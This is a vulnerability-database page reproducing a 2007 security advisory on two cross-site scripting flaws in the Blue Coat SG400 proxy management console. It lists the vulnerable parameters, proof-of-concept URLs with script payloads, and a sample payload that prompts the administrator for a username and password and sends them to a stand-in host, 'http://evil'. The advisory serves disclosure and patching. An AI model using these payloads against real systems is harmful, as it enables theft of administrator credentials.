Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

ProCheckUp Security Advisory 2007.29

🗓️ 01 Nov 2007 00:00:00Reported by Adrian PastorType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 16 Views

Blue Coat SG400 XSS Vulnerability PR07-2

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`PR07-29: Two XSS on Blue Coat ProxySG Management Console  
  
Vulnerability found: 23 July 2007  
  
Vendor informed: 20 August 2007  
  
Vulnerability fixed: 29 October 2007  
  
Advisory publicly released: 1 November 2007  
  
Severity: Medium  
  
Description:   
  
Blue Coat SG400 is vulnerable to a couple of XSS holes.  
  
Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_action/crl_format' / 'name'  
  
Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_from_file.htm' / 'file'  
  
Notes:  
  
The admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to run.  
  
  
Successfully tested on:  
  
Model: Blue Coat SG400   
Software SGOS 4.2.1.6   
Software Release ID: 25173   
  
  
Proof of concept #1:  
  
https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00  
  
Injected payload:  
  
"<script>alert("XSS")</script>%00  
  
Proof of concept #2:  
  
https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--  
  
Injected payload:  
  
<script>alert("XSS")</script><!--  
  
  
A neat payload to inject instead of a alert() box would be a phishing attack which would forward the username and password to a third-party site (the code could be inserted from a third-party site).   
  
i.e.:  
  
<script>  
do {  
a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");  
b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");  
}while(a==null || b==null || a=="" || b=="");  
  
alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b  
</script><!--  
  
  
Consequences:   
  
An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within the context of the target domain.  
  
This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in the Proof of Concept) to unauthorised third parties.  
  
Fixed in:  
  
4.2.6.1, 5.2.2.5  
  
  
References:   
  
http://www.procheckup.com/Vulnerability_2007.php  
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability  
  
  
Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Nov 2007 00:00Current
0.4Low risk
Vulners AI Score0.4
xss vulnerabilityblue coat sg400cross-site scripting
16
.json
Report